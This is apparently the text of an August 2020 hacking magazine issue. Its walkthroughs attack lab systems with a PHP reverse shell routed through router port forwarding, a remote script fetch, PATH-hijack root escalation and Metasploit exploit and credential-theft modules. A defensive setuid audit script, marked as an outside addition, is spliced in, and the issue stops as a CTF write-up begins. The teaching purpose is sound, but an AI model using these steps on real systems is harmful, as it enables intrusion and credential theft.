Hackercool Magazine
Simplifying cyber security. August 2020, Edition 3, Issue 8. A Unique Cyber Security Magazine.

Cover stories:
HACKING A TARGET ON ANOTHER NETWORK WITH YOUR ATTACKER SYSTEM BEHIND A ROUTER
PRIVATE BROWSING: WHAT IT DOES AND WHAT IT DOESN'T
TOOL OF THE MONTH: LINUX SMART ENUMERATION

"Then you will know the truth and the truth will set you free." John 8:32

Editor's Note

Hello aspiring ethical hackers. Hoping you are all awesome and safe. We are releasing our August 2020 Issue with a lot of excitement. Since our May 2020 Issue, our readers have been learning about hacking in different Real World Scenarios. In our May 2020 Issue, we covered a real world scenario where a web server is behind a router with port 80 accessible to the external network. In our June 2020 Issue we covered a real world scenario that involves lateral movement over the hacked network. In our July 2020 Issue, we covered how a simple router misconfiguration can expose the internal network to the internet and get it hacked.

In this Issue, our readers will see one of the most common real world scenarios. Many a time we find our attacker system behind a router. So in this month's RWHS, we will place the attacker system behind a router in a LAN and hack a system that is on a different network (the internet). It is very simple to configure a reverse shell while both attacker and target system are on the same network, but when the target is on a different network and the attacker system is behind a router, the configuration changes. This is one of our favorite scenarios, as many cyber security students have this doubt about how to hack when they are behind a router.

With this scenario, we will have come full circle on some of the most common real world scenarios. We will be moving over to other scenarios from the next Issue. Apart from this, the other regular features are present. We are sure our readers will like this Issue. That's all we have for now.
Until the next issue, Good Bye. Thank You. Stay Home, Stay Safe.

"A HACKER IS SOMEONE WHO USES A COMBINATION OF HIGH-TECH CYBERTOOLS AND SOCIAL ENGINEERING TO GAIN ILLICIT ACCESS TO SOMEONE ELSE'S DATA." - JOHN MCAFEE

INSIDE
See what our Hackercool Magazine August 2020 Issue has in store for you
1. Real World Hacking Scenario: When the attacker system is behind a router.
2. What's New: Kali Linux 2020.3 and Parrot OS 4.10.
3. Metasploit This Month: Drag & Drop Upload RCE, Xshell and Xftp password gather & more modules.
4. Capture The Flag: GreenOptic: 1.
5. Tool Of The Month: Linux Smart Enumeration.
6. Installit: Install Z shell in Kali.
7. Hacking Q&A: Answers to some of the questions our readers ask about ethical hacking.
8. Online Security: Private Browsing: What it does and what it doesn't.
Some Useful Resources

REAL WORLD HACKING SCENARIO

Hi, I'm Hackercool. Today I am gonna show you a scenario where our attacker system is behind a router and obviously the target is on another network. My router is an IPFire router with RED+GREEN configuration and the administrator credentials are "admin:iloveyou". Just like any common router configuration, this configuration allows all the devices in the LAN to access the internet while protecting them from external connections. Needless to say, my attacker machine is Kali Linux. Let me check the internal IP address of my machine.

kali@kali:~$ ip a
[Screenshot of the ip a output; the relevant lines are:]
1: lo: ... link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
3: eth1: mtu 1500 qdisc pfifo_fast state UP group default
    inet 192.168.66.6/24 brd 192.168.66.255 scope global dynamic noprefixroute eth1

The IP of my machine is 192.168.66.6. I am interested in one target IP, 172.28.128.22.
I changed /etc/hosts as follows before I start the hack.

[Screenshot: /etc/hosts opened in GNU nano, with an entry for the target host typo.local]

I'll perform an Nmap scan on the target.

kali@kali:~$ nmap -sV 172.28.128.22
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 10:48 EDT
Host is up (0.011s latency).
[Port table, only partly legible in the scan. It lists an SSH server and HTTP on ports 80, 8000, 8080 and 8081, for example:]
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

There are four web services running on ports 80, 8000, 8080 and 8081 along with an SSH server on the target. I opened all these webpages in the browser. The website on port 80 is displaying the simple text "HELLO User!". It seems the site on port 8000 is also being redirected there. The sites on ports 8080 and 8081 are displaying plain pages. Are these rabbit holes? I need to run nikto on all four ports.

[Screenshot: nikto run against port 80. Legible lines:]
- Nikto v2.1.6
+ Server: Apache/2.4.38 (Debian)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 1 host(s) tested

Running nikto on port 80 gave me nothing.

[Screenshot: nikto run against port 8000. Legible lines:]
- Nikto v2.1.6
+ Server: Apache/2.4.38 (Debian)
+ Root page / redirects to: http://typo.local
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /modules.php?op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
  http://www.cert.org/advisories/CA-2000-02.html.
+ 7917 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2020-08-27 11:01:13 (GMT-4) (104 seconds)

Running nikto on port 8000 confirmed that this was redirecting to http://typo.local. Nikto also caught an XSS vulnerability. I am not a big fan of XSS, so I decided to move further by scanning ports 8080 and 8081.

[Screenshot: nikto run against port 8080. Legible lines:]
- Nikto v2.1.6
+ Server: Apache/2.4.38 (Debian)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host

[Screenshot: nikto run against port 8081. Legible lines:]
- Nikto v2.1.6
+ Server: Apache/2.4.38 (Debian)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ /phpmyadmin/: phpMyAdmin directory found

[Screenshot: the phpinfo() page on port 8080 showing PHP Version 7.3.14-1-deb10u1]

phpinfo gives lots of information. But first let me check the phpMyAdmin. As you already know, phpMyAdmin is used to manage databases, and database means credentials.

[Screenshot: the phpMyAdmin login page on port 8081]

The ports 8080 and 8081 appeared interesting to me, so I ran dirb on both these ports.

[Screenshot: dirb run against http://typo.local:8080/. Legible lines:]
START_TIME: Thu Aug 27 11:14:36 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
[Screenshot: dirb run against http://typo.local:8081/. Legible lines:]
START_TIME: Thu Aug 27 11:15:21 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+ http://typo.local:8081/server-status (CODE:403|SIZE:277)
+ http://typo.local:8081/phpmyadmin/ChangeLog (CODE:200|SIZE:27390)
+ http://typo.local:8081/phpmyadmin/index.php (CODE:200|SIZE:15373)
+ http://typo.local:8081/phpmyadmin/phpinfo.php (CODE:200|SIZE:15375)
==> DIRECTORY: http://typo.local:8081/phpmyadmin/setup/
==> DIRECTORY: http://typo.local:8081/phpmyadmin/themes/

After a few hits and misses, surprisingly I cracked the credentials. They are root:root.

[Screenshot: phpMyAdmin home page after logging in as root]

The TYPO3 database seems to be my way forward. In that database, I found the table be_users interesting.

[Screenshot: the be_users table in phpMyAdmin]

In that table, I found two user entries, "admin" and "user", and an entirely new kind of hash. The new hash is argon2i. After researching further about the argon2 hash, I got to know that it was the winner of the Password Hashing Competition in the year 2015. Wikipedia says it was designed by Alex Biryukov, Daniel Dinu and Dmitry Khovratovich from the University of Luxembourg. Great guys. It was designed especially to withstand GPU cracking attacks, and it's doing a good job of that till now. I cannot crack it, but luckily I got an argon2 hash generator online.
The plan is to generate a hash and replace the original hash with our newly generated hash.

[Screenshot: online Argon2 hash generator, "Choose the Right Parameters for Argon"]

If this works, the new password will be "hcool".

[Screenshot: the generated hash, starting $argon2i$v=19$m=16,t=2,p=1$..., pasted into the admin row of be_users]

The hash is changed. The only thing left is where to log in. Dirb showed that ports 8080 and 8081 don't have any login pages. Let's try port 80.

[Screenshot: dirb run against http://typo.local/. Legible lines:]
START_TIME: Fri Aug 28 05:21:13 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
---- Scanning URL: http://typo.local/ ----
+ http://typo.local/changelog (CODE:403|SIZE:275)
+ http://typo.local/ChangeLog (CODE:403|SIZE:275)
+ http://typo.local/en (CODE:200|SIZE:663)
+ http://typo.local/LICENSE (CODE:403|SIZE:275)
+ http://typo.local/php.ini (CODE:403|SIZE:275)
+ http://typo.local/production.log (CODE:403|SIZE:275)
+ http://typo.local/readme (CODE:403|SIZE:275)
+ http://typo.local/README (CODE:403|SIZE:275)
+ http://typo.local/server-status (CODE:403|SIZE:275)
+ http://typo.local/spamlog.log (CODE:403|SIZE:275)
+ http://typo.local/TODO (CODE:403|SIZE:275)
+ http://typo.local/WS_FTP.LOG (CODE:403|SIZE:275)
+ http://typo.local/fileadmin/akeeba.backend.log (CODE:403|SIZE:275)

On port 80, there is a directory with the same name as the database (typo3) I have modified. Opening this in the browser took me to the login page.

[Screenshot: the TYPO3 backend login page]

On trying the credentials "admin:hcool", I got access successfully.

[Screenshot: the TYPO3 backend after login]

The target is running TYPO3 CMS version 10.3.0. Searchsploit did not give me any exploits related to this version of TYPO3.

kali@kali:~$ searchsploit typo3
[Screenshot of the searchsploit results; the legible entries are:]
Typo3 3.5 b5 - 'Translations.
php' Remote File Inclusion                              | php/webapps/22298.txt
Typo3 3.7/3.8/4.0 - 'Class.TX_RTEHTMLArea_PI1.php' Mul | php/webapps/29300.txt
TYPO3 CMS 4.0 - 'showUid' SQL Injection
Typo3 CMS LinkList 1.4.1 Extension - SQL Injection      | php/webapps/25186.txt
Typo3 Extension JobControl 2.14.8 - Cross-Site Scripti  | php/webapps/34800.txt

With no known exploits, I decided to research this CMS on Google and also on the interface.

[Screenshot: TYPO3 backend, Configuration > $GLOBALS['TYPO3_CONF_VARS'] (Global Configuration), showing the file upload configuration]

Here, there is a blacklist of file extensions that are prevented from being uploaded to the website. The file extensions php, phpsh, phtml, pht, phar etc. cannot be uploaded. Maybe if I can make changes to this blacklist, I can upload a PHP webshell to the target. This can't be changed from here. On searching, I found Installation Wide Configuration in the Settings tab.

[Screenshot: Configure Installation Wide Options, showing the [BE][fileDenyPattern] setting with its default blacklist]

The first thing I do is just change the initial part of the blacklist. I am rather a patient learner. So whenever I encounter something new (TYPO3 CMS), I just try different things just in case it proves handy in future hacks.

[Screenshot: Configure Installation Wide Options with the edited [BE][fileDenyPattern] value]

Let me see if we can upload a PHP file now.

[Screenshot: the upload attempt]

Enough experimentation. This time I removed the whole blacklist and tried to upload the test file.
[Screenshot: the test file uploaded successfully]

The upload is successful. Just like in many of my previous hacking attacks, we need to assign the attacker IP address in the web shell.

[Screenshot: the PHP reverse shell source, starting with set_time_limit(0); and the IP and port variables]

kali@kali:~$ ip a
[Screenshot of the ip a output; the relevant lines are:]
1: lo: ... link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: ... link/ether 08:00:27:65:58:cd brd ff:ff:ff:ff:ff:ff
3: eth1: mtu 1500 qdisc pfifo_fast state UP group default
    link/ether 08:00:27:52:48:e1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.66.6/24 brd 192.168.66.255 scope global dynamic noprefixroute eth1
       valid_lft forever preferred_lft forever

I saved the shell as hcoolshell.php and successfully uploaded it to the target.

[Screenshot: the TYPO3 file list showing hcoolshell.php]

Its storage is in fileadmin, which also made a constant appearance while running dirb.

[Screenshot: a browser page reading "Not Found. The requested URL was not found on this server. Apache/2.4.38 (Debian) Server at typo.local Port 80"]

Finally, when I found the shell, I got an error saying that the web shell failed to daemonise as the network was unreachable.

WARNING: Failed to daemonise. This is quite common and not fatal. Network is unreachable (101)

The netcat listener I started prior to executing the web shell is just as it is.

[Screenshot: the netcat listener, still waiting for a connection]

From here on, follow carefully. This is where the REAL WORLD Scenario changes. See the image below to understand the network of this scenario.

[Network diagram: the INTERNET on one side; the IPFire router at 172.28.128.19; the Attacker System at 192.168.66.6 on the LAN behind it]

As already told, our attacker system is part of a LAN with IP 192.168.66.6 and our target website is on the internet with IP 172.28.128.22. In the PHP reverse shell I uploaded to the target, I specified the IP address as 192.168.66.6.
Forget about this IP, the target doesn't even know where to search for this address. Hence when I execute the shell, it says the network is unreachable. So what is the solution when the attacker system is behind a router? The solution is configuring port forwarding on the router. So I log in to the router and create a new firewall rule.

[Screenshot: ipfire.localdomain, Firewall Rules page]

Although in this scenario I am showing the IPFire router, the process of configuring port forwarding is almost the same in all routers or just slightly different. Here's how the default firewall rule looks.

[Screenshot: the new firewall rule form. Source: source address (MAC/IP address or network), Standard networks: Any. NAT: Use Network Address Translation (NAT), unchecked. Destination: destination address (IP address or network), Standard networks: Any. Protocol: All]

For my port forwarding rule, I change the source to any standard network so that a machine on any network can find it. Then I enable NAT, and that too Destination NAT. I set the destination IP address to 192.168.66.6.

[Screenshot: the rule with Source: Standard networks: Any; NAT: Use network address translation (NAT) checked, Destination NAT (Port forwarding) selected, Firewall interface: - Automatic -, Source NAT showing GREEN (192.168.66.1); Destination: 192.168.66.6]

One last thing, I change the protocol from "all" to "tcp" and specify the destination port and external NAT port as 1234. I leave a remark on this firewall rule as "incoming reverse shell" and save it.

[Screenshot: the Protocol section of the rule, and the ipfire.localdomain Firewall Rules page listing the saved rule]

In summary, what I am configuring here is that any machine that makes a connection to port 1234 of the IPFire router is forwarded to port 1234 of my attacker system.
Since there is no way of my target knowing the IP address of my attacker system, the router's IP address should be the one in the shell.

[Screenshot: the PHP reverse shell source with set_time_limit(0); and the new IP and port]

So I create a new shell named hcoolshell2.php having IP 172.28.128.19 (the router's IP address) and port 1234 (port forwarded to 192.168.66.6, my attacker system). Then I upload the new shell to the target.

[Screenshot: executing hcoolshell2.php in the browser; it prints "WARNING: Failed to daemonise. This is quite common and not fatal."]

This time I successfully have a shell on the target.

kali@kali:~$ nc -lvp 1234
listening on [any] 1234 ...
[connection details]
Linux typo 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
 16:22:38 up 1:34, 0 users, load average: 0.00, 0.00, 0.00
[id output]
$ uname -a
Linux typo 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
$

This is a shell with limited privileges. So I need to escalate privileges. I will use a new tool named Linux Smart Enumeration to help me in privilege escalation. So I clone it onto my attacker machine. But I need to upload it to the target. So I start the Python web server on port 8000 on my attacker machine.

kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

On the router, I forward port 8000 also to my attacker machine.

[Screenshot: a second firewall rule, Source: Standard networks: Any, NAT: Destination NAT, Protocol: TCP, port 8000, and the Firewall Rules page listing both rules]

Now I can download the Linux Smart Enumeration script to my target.

[Screenshot: wget fetching lse.sh from the router's forwarded port 8000. Legible lines:]
Length: 37926 (37K) [text/x-sh]
2020-08-28 16:49:04 (11.8 MB/s) - 'lse.sh' saved [37926/37926]
$ chmod 777 lse.sh
$ ./lse.sh
[Screenshot of the lse.sh output. Legible lines:]
LSE Version: 2.5
PATH: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
4.19.0-8-amd64
[...]
Binaries with setuid bit
/usr/local/bin/apache2-restart
/usr/local/bin/phpunit

One of them is a PHP script and the other a Linux executable.

[Screenshot of the file command on both binaries. Legible lines:]
/usr/local/bin/apache2-restart: setuid ELF 64-bit LSB executable, x86-64, ... for GNU/Linux 2.6.18, BuildID[sha1]=7f141086cfbe35713b5871941d2db74795d89ab ...
/usr/local/bin/phpunit: setuid, setgid a /usr/bin/env php script executable (binary data)

These cannot be edited. I was not interested in the PHP script, so I focused on the apache restart binary. Running the strings command showed me something interesting.

[Screenshot of strings on /usr/local/bin/apache2-restart. Legible lines:]
system
[...]
service apache2 start

There is a command "service apache2 start". The service command is being used in this binary. This may be my only way to escalate privileges. I will create a new instance of the service file in the tmp directory with the command /bin/bash, which will give us a new shell. Then I will add the tmp directory to PATH. This method is known as PATH privilege escalation. Since the service command is part of the /usr/local/bin/apache2-restart binary, which can be run as root, executing this will give us a shell with root privileges.

$ pwd
/tmp
$ echo "/bin/bash" > service
$ chmod 777 service
$ export PATH=/tmp:$PATH
$ /usr/local/bin/apache2-restart
# whoami
root
# python -c 'import pty;pty.spawn("/bin/bash")'
root@typo:/tmp# pwd
/tmp
root@typo:/tmp# cd /root
root@typo:/root# ls
[listing of /root]
root@typo:/root#

WHAT'S NEW

Kali Linux 2020.3

[Screenshot: Kali Linux 2020.3 desktop]

METASPLOIT THIS MONTH

Welcome to the August 2020 Metasploit This Month feature. Let us see the latest exploit modules of Metasploit.
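Before the modules, a defender's footnote to the apache2-restart privilege escalation in the scenario above. The root cause is a setuid binary that shells out to a bare command name and so trusts whatever PATH its caller supplies. The following Python audit script is an added example, not from the magazine or from lse.sh: it reproduces the three checks the scenario relied on (a PATH-trusting libc call, a relative command string, and a writable PATH entry) as functions an administrator can run over the setuid binaries on a host. SAMPLE_STRINGS and SAMPLE_PATH are constructed to imitate the strings and PATH output shown above; all function names are my own.

```python
"""Audit setuid binaries for the PATH-hijack defect shown in the scenario.

Fix for a binary flagged here: invoke /usr/sbin/service by absolute path, or
set PATH to a fixed trusted value before shelling out, and never inherit the
caller's environment in a setuid program.
"""
import os
import re
import stat

# libc entry points that run /bin/sh or search PATH for the program name.
# A setuid binary calling these with a bare command name trusts the caller's PATH.
PATH_TRUSTING_CALLS = ("system", "popen", "execvp", "execlp", "execvpe")

# Constructed sample: what `strings` typically prints for a small setuid
# wrapper that runs `service apache2 start` via system().
SAMPLE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2",
    "libc.so.6",
    "system",
    "__libc_start_main",
    "GLIBC_2.2.5",
    "service apache2 start",
    "GCC: (Debian 8.3.0-6) 8.3.0",
]

# Constructed sample: the PATH reported by lse.sh with /tmp prepended,
# as the attacker did before running the binary.
SAMPLE_PATH = "/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

_BARE_PROGRAM = re.compile(r"[a-z][a-z0-9_.-]*")


def extract_strings(data, min_len=4):
    """Pure-Python equivalent of `strings`: printable ASCII runs of min_len+ bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def commands_from_strings(strings):
    """Strings that look like a command line whose program is a bare name.

    Heuristic: the first token is a lowercase bare word with no '/', and at
    least one argument follows. 'service apache2 start' matches;
    '/usr/sbin/service apache2 start' does not, since an absolute path
    cannot be shadowed through PATH.
    """
    found = []
    for s in strings:
        parts = s.split()
        if len(parts) >= 2 and _BARE_PROGRAM.fullmatch(parts[0]):
            found.append(" ".join(parts))
    return found


def writable_path_entries(path_env, writable=None):
    """PATH entries the calling user could write to, in lookup order.

    An empty entry means the current directory, which the caller always
    controls. `writable` is injectable so the check runs on constructed data;
    by default it asks the OS about the current (ideally unprivileged) user.
    """
    if writable is None:
        writable = lambda d: os.access(d, os.W_OK)
    entries = [e or "." for e in path_env.split(":")]
    return [e for e in entries if e == "." or writable(e)]


def audit_setuid_binary(strings, path_env, writable=None):
    """Combine the three signals into one verdict for a binary."""
    calls = [c for c in PATH_TRUSTING_CALLS if c in strings]
    commands = commands_from_strings(strings)
    exposed = writable_path_entries(path_env, writable)
    return {
        "path_trusting_calls": calls,
        "relative_commands": commands,
        "writable_path_entries": exposed,
        # Defect in the binary itself: it resolves a command through PATH.
        "hijackable": bool(calls and commands),
        # Exploitable right now by a user who can supply this PATH.
        "exploitable_with_this_path": bool(calls and commands and exposed),
    }


def find_setuid_binaries(roots=("/usr/local/bin", "/usr/local/sbin")):
    """Walk the given directories and return regular files with the setuid bit."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    hits.append(path)
    return sorted(hits)


def audit_file(path, path_env=None):
    """Audit one setuid binary on disk against the current process's PATH."""
    with open(path, "rb") as fh:
        strings = extract_strings(fh.read())
    return audit_setuid_binary(strings, path_env or os.environ.get("PATH", ""))


def demo():
    """Audit the constructed sample, treating only /tmp as writable."""
    return audit_setuid_binary(SAMPLE_STRINGS, SAMPLE_PATH, writable=lambda d: d == "/tmp")


if __name__ == "__main__":
    for binary in find_setuid_binaries():
        print(binary, audit_file(binary))
    print("constructed sample:", demo())
```

Run it as an ordinary user, not root, or the writable-directory check will report every PATH entry as writable.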
Drag & Drop Multiple File Upload - Contact Form 7 Pre-auth RCE Module

Drag and Drop Multiple File Upload is a WordPress plugin used in conjunction with the Contact Form 7 plugin to upload multiple files. It has over 20,000 active installs. All the above mentioned versions of this plugin are vulnerable to a remote file upload vulnerability. This plugin controls uploads by a file extension whitelist. However, this whitelist can be bypassed by appending "%" (without the double quotes) to the end of the file name. The good thing is that this module does not require authentication. This was tested on plugin version 1.3.3.2 installed on WordPress 5.4 with the Contact Form 7 plugin. The download information of the vulnerable software is given in our GitHub repository.

[Screenshot: the WordPress plugins page with both plugins activated]

Both these plugins are activated. Let's see how this module works. Load the module as shown below.

msf5 > use exploit/multi/http/wp_dnd_mul_file_rce
msf5 exploit(multi/http/wp_dnd_mul_file_rce) > show options

Module options (exploit/multi/http/wp_dnd_mul_file_rce):
[Screenshot of the options table: RHOSTS, RPORT, SSL (Negotiate SSL/TLS for outgoing connections), TARGETURI (default /), the payload options and the exploit target]

msf5 exploit(multi/http/wp_dnd_mul_file_rce) >

Set the required options and check if the target is vulnerable or not.

[Screenshot of the set commands; the target URI is set to /wordpress5.4]
msf5 exploit(multi/http/wp_dnd_mul_file_rce) > check
[*] 192.168.36.148:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/wp_dnd_mul_file_rce) >

Then execute the module as shown below.

[Screenshot of the module run. Legible lines:]
Found version 1.3.3.2 in the plugin
192.168.36.148:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/wp_dnd_mul_file_rce) > run
[Screenshot of the run output. Legible lines:]
Getting nonce
Sending stage (38288 bytes) to 192.168.36.148
Meterpreter session 1 opened (192.168.36.132:4444 -> 192.168.36.148:43746) at 2020-08-...
meterpreter > sysinfo
[system information of the target]
meterpreter >

This should give us a meterpreter session on the target, as shown in the above image.

GOG Galaxy Client Privilege Escalation Module

GOG Galaxy is a video game management client for Windows and MacOS. All the above mentioned versions have a privilege escalation vulnerability. This is because one of its Windows services, "GalaxyClientService", runs with SYSTEM privileges. This module communicates with this service and instructs it to execute commands as SYSTEM. Let's explain how this module works. We tested this on GOG Galaxy Client software version 2.0.12 installed on Windows 10. Since this is a privilege escalation module, we need to get a session on the target first. This session can be of LOW privileges, as shown in the image given below.

[Screenshot of an initial session. Legible lines:]
Meterpreter session 2 opened (192.168.36.132:4466 -> 192.168.36.129:49782) at 2020-08-...
meterpreter > sysinfo
Computer : ...
OS       : Windows 10 (10.0 Build 17134).
[remaining sysinfo lines]
meterpreter > getuid
[a low-privileged user]
meterpreter > background

Background this session and load the gog_galaxyclientservice_privesc module.

msf5 exploit(...) > search gog_galaxy
[Screenshot of the search result listing exploit/windows/local/gog_galaxyclientservice_privesc]
msf5 exploit(...) > use exploit/windows/local/gog_galaxyclientservice_privesc
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > show options

Module options (exploit/windows/local/gog_galaxyclientservice_privesc):
[Screenshot of the options table: SESSION (the session to run this module on), the payload options and the exploit target]

Set the required options and check if the target is indeed vulnerable.

msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 2
session => 2
[Screenshot of the set commands and the check output reporting the target as vulnerable]

After all the options are set, execute the module.

msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > exploit
[Screenshot of the exploit output. Legible lines:]
Connecting to service ...
Sending stage (176195 bytes) to 192.168.36.129
Meterpreter session 3 opened (192.168.36.132:... -> 192.168.36.129:...) at 2020-08-...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))
meterpreter > sysinfo
Computer : ...
OS       : Windows 10 (10.0 Build 17134).
[remaining sysinfo lines]

This should give us a meterpreter session with SYSTEM privileges on the target, as shown in the above image.

msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > sessions
[Screenshot of the sessions list: Id, Name, Type, Information, Connection for the sessions opened above]

POST Xshell and Xftp Gather Passwords Module

TARGET: Xshell and Xftp    TYPE: Local    ANTI MALWARE: ON

Xshell and Xftp are Windows based SSH and FTP clients, respectively, made by NetSarang. Xshell supports the SSH, SSH2, SFTP, TELNET and RLOGIN protocols. Both Xshell and Xftp use Xmanager to encrypt their credentials.
This module reverses the encrypted credentials and reveals them. However, this will only work when the user chooses to remember the username and password. Just like every POST exploit, this one needs a meterpreter session on the target. Let's see how this module works. We have tested this on a Windows 10 target with the latest version of Xshell installed. Let's set the target first. Install Xshell on the Windows 10 target. Start the SSH server in Kali Linux to connect from the Windows 10 target.

[Screenshot: Xshell on the Windows 10 target connecting to the Kali SSH server, with the credentials remembered]

[Screenshot of getting a session on the target. Legible lines:]
msf5 exploit(...) > run
Started reverse TCP handler on 192.168.36.132:4466
Sending stage (...) to 192.168.36.129
Meterpreter session 4 opened (192.168.36.132:4466 -> 192.168.36.129:49738) at 2020-08-...
meterpreter > background

[Screenshot of loading the Xshell and Xftp gather post module, its options table, and setting the SESSION option to 4]

msf5 post(...) > run
Gather Xshell and Xftp Passwords on DESKTOP-U061SVS
[Screenshot of the recovered session entries: host, port, username and decrypted password for the saved Kali SSH session]
[+] Passwords stored in: /home/kali/.msf4/loot/20200823060249_default_192.168.36.129_host...
Post module execution completed
msf5 post(...) >

This will get us the credentials of Xshell or Xftp installed on the target.

Agent Tesla Panel RCE Module

TARGET: Agent Tesla Control Panel    TYPE: Remote    ANTI MALWARE: ON

Agent Tesla is a password stealing malware which has been around since 2014. However, it gained popularity in the year 2018 for its easy to use interface and powerful operation. By the year 2018, the Agent Tesla subscription service had around 6300 paid subscribers. Just like other RAT malware, even Agent Tesla has a control panel to manage the functions of the malware installed on different systems. This module exploits a command injection vulnerability along with an SQL injection vulnerability and a PHP object injection vulnerability to execute code on the target system remotely.
All the versions of the Tesla Control Panel prior to the year 2018 can be exploited without authentication, whereas the Tesla control panel software after the year 2018 needs authentication for exploitation. This module only works on panel software running on Windows.

Let's see how this module works. We have tested this on a Windows 10 target with Tesla control panel version 13.7. This panel software was hosted on WAMP server (version 3.2.2) with PHP version 5.6.4. The download information of the vulnerable software is given on our GitHub repository. Load the agent_tesla_panel_rce module as shown below.

msf5 > use exploit/multi/http/agent_tesla_panel_rce
msf5 exploit(multi/http/agent_tesla_panel_rce) > show options

Module options (exploit/multi/http/agent_tesla_panel_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        ...
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /WebPanel/       yes       ...
   USERNAME                    no        ...
   VHOST                       no        HTTP server virtual host

Payload options:
   LHOST  ...  The listen address (an interface may be specified)
   LPORT  ...  The listen port

Exploit target:
   0   Automatic (PHP-Dropper)

msf5 exploit(multi/http/agent_tesla_panel_rce) >

Set the required options and check if the target is indeed vulnerable or not.

[Screenshot of the set commands and the check]
msf5 exploit(multi/http/agent_tesla_panel_rce) > check
[*] 192.168.36.1:80 - The target is vulnerable.
msf5 exploit(multi/http/agent_tesla_panel_rce) >

Then execute the module.
msf5 exploit(multi/http/agent_tesla_panel_rce) > run
[Screenshot of the run output: the module confirms the target is vulnerable, uploads a PHP dropper to the panel's server_side/scripts directory, triggers it, and removes it afterwards. Legible lines:]
Deleted C:\wamp64\www\WebPanel\server_side\scripts\.£FuDaaPZqi.php
meterpreter > sysinfo
Computer        : ...
OS              : Windows 10 (10.0 Build 18362).
Architecture    : AMD64
Server username : SYSTEM (0)
meterpreter >

As you can see, this will give us a meterpreter session on the target, as shown in the above image.

WHAT'S NEW

Parrot 4.10

[Screenshot: Parrot OS 4.10 desktop]

CAPTURE THE FLAG

GreenOptic: 1

You may take numerous courses on cyber security and ethical hacking, but you will not hone your skills unless you test your skills in a Real World hacking environment. CAPTURE THE FLAG scenarios and VM labs provide beginners, and those who want a real world testing lab, with an environment for practice. These scenarios also provide a variety of challenges which help readers and users gain knowledge about different tools and methods used in Real World penetration testing. These are useful not only for beginners but also for security professionals, system administrators and other cyber security enthusiasts. We at Hackercool Magazine strive to bring our readers some of the best CTF scenarios every month. We suggest our readers not only read these tutorials but also practice them by setting up the VM. Like other articles of our magazine, this article too has been written so that it is easily understandable to beginners. To make this simpler, this article has been replayed as a challenge being performed by an amateur hacker.

Hi Hackercoolians. Welcome back. Hope you are all safe and taking all the safety precautions to keep the Covid 19 virus away from you. GOD keep you all safe and sound in the current crisis. In our present Issue, I bring you the CTF challenge of GreenOptic: 1. This machine is authored by "Thomas Williams".
The author, who rated it as "Very Hard", also mentions that he designed this machine to be very realistic. He says that everything you experience in this machine will be in the Real world. He also suggests that enumeration is the key to solving his CTF machine. The machine can be downloaded from the link given below.

https://www.vulnhub.com/entry/greenoptic-1,510/

This machine is working fine in both VirtualBox and VMware, and it is set to get an IP address automatically as DHCP is enabled. The author also suggested using this with a Host-only adapter, as this does not need any internet. I used two attacker machines which are various versions of Kali Linux. The reason I did this will become known as you go through the challenge.

The story behind this machine is like this. "British Internet Service Provider GreenOptic has been subject to a large scale Cyber Attack. Over 5 million of their customer records have been stolen, along with credit card information and bank details. GreenOptic have created an incident response team to analyze the attack and close any security holes. Can you break into their server before they fix their security holes?"

So let's start having fun. After booting the target machine, the first thing I do is network scanning with Nmap to find the IP address of my target. This I do using the SYN PING scan of Nmap.

[Screenshot of the sudo nmap SYN ping scan of the local subnet. Legible lines:]
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 08:48 EDT
